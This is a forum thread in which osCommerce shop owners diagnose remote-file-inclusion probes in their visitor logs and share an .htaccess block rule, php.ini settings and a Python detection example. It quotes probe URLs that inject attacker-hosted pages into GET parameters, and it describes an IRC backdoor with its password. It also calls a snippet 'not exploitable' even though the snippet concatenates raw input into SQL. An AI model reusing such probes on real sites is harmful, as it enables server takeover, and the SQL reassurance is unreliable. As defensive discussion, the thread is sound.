
WoodsWalker

Weird Stuff in "Who's Online"


From the little I know, I suppose these are attempts to redirect your site visitors to something irrelevant, or even harmful. As other contributors to this thread have mentioned, these "script kiddies" who spend their time making these hack attempts usually cause more annoyance than harm. We've all heard tales of them hacking into, well, something like the CIA site so that visitors are redirected to a picture of a bunny rabbit or what-have-you. And then they can say, HA HA - we're smarter than those pencil-necks at the Pentagon.

 

I just want to sell my widgets.


There was an exploit of the osCommerce redirect.php file, which allowed your website to act as an open redirect. There was no check performed to see if the sort of link being talked about came from inside or outside of your website. This was plugged back in 2005, but the automated programmes used by hackers still look for it simply because there are so many people who fail to update their old websites.

 

Vger


So ... when we see those weird URLs in our Who's Online lists, it might be hackers trying, unsuccessfully, to find that old vulnerability?

 

I guess, as you've said, there's no danger as long as we're using an up-to-date osC version.


 

I hope so! I added that security pro to prevent injection hacks. I can't tell if it is doing anything but it's in there at least. Very easy mod, took me maybe 10 minutes at the most.


I'm getting that too. It's from IP 207.112.76.81, and here's the link.../product_info.php?products_id=http://calebsbirth.pisem.su/mybaby.htm?

 

Strange, I'm just going to block that IP address.

It's from Canada.

 

Rob


 

If you block it, chances are you are going to block other legitimate customers that may originate from that same server. If you watch your who's online you will start to notice it comes from random IPs, so you would be fighting a losing battle trying to block every one of them. I get between 4000 and 5000 uniques a month on my site now and I wouldn't want to lose a portion of that by blocking an IP.

Hi Folks,

 

Every now and then when I look at "Who's Online", under "Last URL" I see this:

 

/catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm?

 

or something similar.

 

I have no such paths in my site.

 

I checked what was at http://babycaleb.fortunecity.co.uk/index.htm, at peril of getting viruses, and it looked like a legit page of baby pictures (but who knows?).

 

The IP Address of this entry was 65.93.226.125, which turned out to be a not-particularly-suspicious address from Bell Telephone in Toronto.

 

Anyone seen this kind of thing? Know what it is?

 

Thanks,

~Wendy

I am new here and not a user of osCommerce (yet?) but I have been trying to find out more information on this "Baby Caleb" url. I have seen 3-4 different versions of this url try and attach themselves to various parts of my website. I have not yet found any malicious code or JS files. But the link you have given above is not just for a page with three or four images of a baby and his mom, but rather there is actually a whole section of the page that you cannot see because it is written in white text on a white background. Check the source code and you will see it. It is some type of encrypted script at the bottom of that page. I haven't figured out what exactly it is or does so if any of you can figure it out that would be wonderful as I am afraid it is doing unspeakable things to my website.

 

Brennan the Vyper


the white text on a white background is nothing to worry about. in fact, it's the script that you mentioned, displayed in the webdings font so it just looks like a bunch of garbage. so going to the site by itself does nothing.

 

however, after looking at the script i can say that it's very dangerous. it gives them a back door into your site. using it, they can scan for files, run system commands, send emails, create and delete directories and files and basically do anything they want.

 

you say you're not using osc. what are you using? and what is the exact url that the hacker is using to run the script? somehow, the contents of that page are being downloaded by your server and then executed -- which runs their script, which is what's causing the problem.

 

the script is enclosed within the shorthand <? and ?> tags, not the longer <?php tag. can you get your host to turn off recognizing <? as a php tag? that will at least stop the execution of the script until you can plug up the hole on your site that is allowing them to download the contents of their page and execute it.

 

feel free to contact me if you want more help in getting rid of this.


Hi Dave,

 

I don't know about Brennan the Vyper, but I myself use osC (the original post is mine), and I just see this URL

 

/catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm?

pop up occasionally in my Who's Online, under Last Visited Page.

 

Am I in any danger?

 

Thanks,

~Wendy


Thanks Dave, My webhost has had the PHP shorthand <? ?> turned off for a while. The URL pops up in my counter script as a new page, usually something like http: // vyperphotos . com / gallery . php?="Baby Caleb URL". My host says he hasn't noticed any odd behavior from my site but that doesn't say much.


A client sent me an email regarding this and asked me to research the exploit and make sure that his store was not affected. Here are the details about the exploit and what you can do to avoid it:

 

What's happening is the attacker has automated scripts hitting random sites across the internet, looking for GET parameters in the sites' HTML source code. It then attempts to pass the URL of the attacker's website to these GET variables (like "Faq_item", "cat_id", etc) hoping that the PHP code opens and executes whatever is passed. In other words, I doubt that they find that many exploitable servers because that combination of requirements isn't common.

 

The babycaleb website that's being passed may look innocent but when you look at the HTML source code you'll find a PHP script that gets injected into vulnerable sites. The PHP code is obfuscated, but I was able to decode most of it.

 

Basically what happens is when their automated bot finds an exploitable site, the code gets executed and logs into an IRC server on port 8080 at one of the following URLs at random (in case one goes down, I assume):

 


Port: 8080

Channel: ##-u

Password: secretpass

 

(Note that 3 out of the 8 have the name "mcar" or "mcarlos" in the URL)

 

At this point the script will continuously loop, waiting for commands from someone logged into that IRC server. The script gives the attacker complete control over the server and would allow them unlimited access. They could list all files in your site, delete files, execute code, install applications, etc.

 

The way it is designed there is no way to know if someone has exploited your website until they begin making changes within your site. It is possible that you could detect them if there are PHP processes that are hours old, but that would be very difficult on a shared server to see. But again, it's very doubtful that they were successful on any of your sites because it would require a very very badly written PHP file that executes whatever command is passed in the GET variables for this to work.

 

My only suggestion to avoid being exploited is to add this untested bit of code to your .htaccess file:

RewriteEngine On
RewriteCond %{QUERY_STRING} https?://
RewriteRule .* - [F]

What it basically does is if "http://" or "https://" is found in any GET parameter passed to your site, the visitor will see a 403 Forbidden page. So even if you have an exploitable script on your site, they wouldn't be able to access it. Again, this is untested so make sure your store works after putting it in. This fix could possibly kill redirection scripts, but I'll leave that up to you all to figure out.


Please use the forums for support! I am happy to help you here, but I am unable to offer free technical support over instant messenger or e-mail.


WOW, Brian - thanks very much for that comprehensive explanation. B) This has been worrying me and others for some time now.

 

Probably we're safe, as you say, but I'll try your code just to be safe. And I'll check to make sure everything is still working after I do it.

 

Thanks again,

~Wendy


hi wendy,

 

like brian said, the hacker is looking for vulnerable sites. the specific vulnerability they're hoping to find is some code that would include a file name that is specified as the value of a get parameter. so your url of /catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm would only 'work' if there was an include($_GET['cPath']) in the code. (that, and the host has enabled doing includes of http:// files instead of just local system files. this can be controlled via the php.ini file.) osc doesn't do that. for the most part, osc is pretty good about cleaning the contents of get parameters before using them, and i don't think there's any part of the code that will do an include with the value of a get parameter.

 

i did send a note to fortune city telling them about the site and the fact that there's some malicious code on there. i have no idea if anyone will take note or even action about the site. and of course, there's nothing stopping the hacker from creating another one under a different name.

 

if you have the security pro add-on, then you are safe. if you have current osc code, you should also be pretty safe since the current code base (2.2RC2) doesn't have any code that is vulnerable to this type of exploit. *but* that's just the stock osc code. if you have a bunch of add-ons, who knows what those are doing. some of the add-ons i've seen *do* use raw, unchecked $_GET values. so if you're concerned you should look at your own code and see if there is anything vulnerable to something like this.
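Added example (not code from this thread, from osCommerce or from any contribution) showing in Python what Brian's .htaccess rule and Dave's point about cleaning GET values come down to: a check for a URL scheme in the query string, a strict allow-list for cPath, and a triage over a constructed list of Who's Online "Last URL" entries. It assumes stock osC category paths are digits joined by underscores, and it matches the scheme case-insensitively, which the posted RewriteCond does not do without the [NC] flag.

```python
import re
from urllib.parse import parse_qsl, urlparse, urlsplit

# The RewriteCond in the thread fires on a URL scheme anywhere in the query
# string. Apache matches case-sensitively unless the [NC] flag is added, so
# this check is deliberately case-insensitive (an assumption, not the rule).
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Stock osC category paths look like "21" or "21_25_33": digits joined by
# underscores. An allow-list this strict rejects a URL before it is used.
CPATH_OK = re.compile(r"^\d+(?:_\d+)*$")

# Constructed sample of "Last URL" entries: the two probes quoted in the
# thread plus two ordinary shop requests.
SAMPLE_LAST_URLS = [
    "/catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm?",
    "/product_info.php?products_id=http://calebsbirth.pisem.su/mybaby.htm?",
    "/catalog/index.php?cPath=21_25",
    "/catalog/product_info.php?products_id=31&osCsid=abc123",
]


def query_has_remote_url(request_path):
    """True when the query string carries http:// or https://, i.e. the
    request the .htaccess rule would answer with 403 Forbidden."""
    return bool(REMOTE_URL.search(urlsplit(request_path).query))


def is_valid_cpath(value):
    """Strict allow-list check a script should apply to $_GET['cPath']."""
    return bool(CPATH_OK.match(value))


def probed_parameters(request_path):
    """(parameter, remote host) for every GET value that is a remote URL,
    which shows which parameter the bot was trying to feed its payload to."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_path).query,
                                 keep_blank_values=True):
        if REMOTE_URL.match(value):
            hits.append((name, urlparse(value).hostname))
    return hits


def triage(urls):
    """Split entries into (blocked, allowed), as the rewrite rule would."""
    blocked = [u for u in urls if query_has_remote_url(u)]
    allowed = [u for u in urls if not query_has_remote_url(u)]
    return blocked, allowed


if __name__ == "__main__":
    for entry in triage(SAMPLE_LAST_URLS)[0]:
        print("BLOCK", probed_parameters(entry), entry)
```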


I installed the code as Brian said in my .htaccess file. At the same time I was monitoring the who's online in admin and watching nasty little BabyCaleb roam around. After the code was installed it was gone seconds after. I have been watching for about an hour on and off and so far so good. When someone attacks my site it is a big concern for me.

I had asked Brian to take a look and post what he finds. As usual he has done a good job. Everything seems to be fine.


Thanks, everyone!

 

I'm glad finally to have some concrete information on this.

 

The only add-ons I have are Header Tags SEO, Who's Online Enhancement, SuperTracker, and Order Editor. I'll have a look in the code that was provided with them, but as they are very popular and widely used, I'd be surprised if they contained any sloppy code.

 

I wonder - I wouldn't be surprised if a PCI scan would also pick up this kind of vulnerability. I failed a scan during the summer, and the culprit was said to be a cross-site scripting vulnerability in osC's Advanced Search function. My site didn't really need this, so I simply removed the related files and then passed the scan.

 

Thanks again,

~Wendy


OK, I've found a $_GET['cPath'] in the code that was installed with the SuperTracker contribution.

 

Here's the snippet where it occurs:

 

// If we are on index.php, but looking at category results, make sure we record which category
if (strpos($current_page, 'index.php')) {
    if (isset($_GET['cPath'])) {
        // $cat_id is taken straight from the query string; only the last
        // underscore-separated element is kept, and nothing validates it.
        $cat_id = $_GET['cPath'];
        $cat_id_array = explode('_', $cat_id);
        $cat_id = $cat_id_array[sizeof($cat_id_array) - 1];
        $categories_viewed[$cat_id] = 1;
    }
}

// The serialized array (including the raw $cat_id key) is concatenated
// into the SQL string below without escaping.
$categories_viewed = serialize($categories_viewed);
$query = "UPDATE supertracker set last_click='" . $last_click . "', exit_page='" . $current_page . "', num_clicks='" . $num_clicks . "', added_cart='" . $added_cart . "', categories_viewed='" . $categories_viewed . "', products_viewed='" . $products_viewed . "', customer_id='" . $cust_id . "', completed_purchase='" . $completed_purchase . "', cart_contents='" . $cart_contents . "', cart_total = '" . $cart_total . "', order_id = '" . $order_id . "' where tracking_id='" . $tracking_id . "'";
tep_db_query($query);

}
else {

 

Is this dangerous? Does it depend on my host's policies?

 

Looks as if I should either remove this or make that mod to the .htaccess file.


No, that code you posted is not exploitable.

 

From what I can tell, it doesn't target any specific GET parameter, but parses them out of your HTML source and tries them all. I wouldn't even bother worrying about it.

 

But the .htaccess change that I posted on the last page will completely remove any risk that you would be exploited by this. It will also keep these bots from appearing on your Who's Online page.




Great! Thanks for the clarification. :D

 

I am now enlightened, as are the probably 50 other folks following this thread.

 

Thanks again, and have a marvellous weekend!

~Wendy


 

yeah, i was going to tell you that supertracker does have a few instances of using raw get variables, but you already found one.

 

as brian said, this isn't really dangerous, there'd have to be an include($_GET['cPath']) for there to be any danger, and osc doesn't do includes with any get variables ... as far as i know.

 

i know there's a way of turning off the ability to include 'remote files' as php calls this type of include. generally speaking, you shouldn't ever need to include a file that is not on the server's own file system. i'll look up how to do that and post a bit later. turning that capability off would disable this type of attack, but it won't stop hackers from trying it. you'll still see them on your who's online report. they'll just be wasting your bandwidth. but between that and brian's htaccess trick to block the url you would be quite safe from this type of attack.


here's what you need to disable php from opening and/or including remote files. inside a php.ini on your machine, make sure the following two items are set:

 

allow_url_fopen = Off

allow_url_include = Off

 

as far as i know, osc does not make use of these at all, so it should be safe to set these off.


Thanks, Dave!

 

Here's where I show what a noob I am: where would I find a php.ini file? My site is hosted on a shared server.

 

Thanks,

~Wendy


hi wendy. sorry for taking a while to respond. i've been a bit busy with other things and haven't been posting much.

 

where your php.ini file is depends on your host. with some hosts, it's in your public_html directory. others allow this in any directory, so you'd probably want it in the lowest level directory that you have php files, so that'd be your "catalog" directory, or equivalent.

 

some hosts don't recognize it, but will allow you to make some php settings in a .htaccess file.

 

if you're in doubt, contact your host and ask them where the best place to put those settings would be. they should be able to point you in the right direction.

 

i hope that helps.
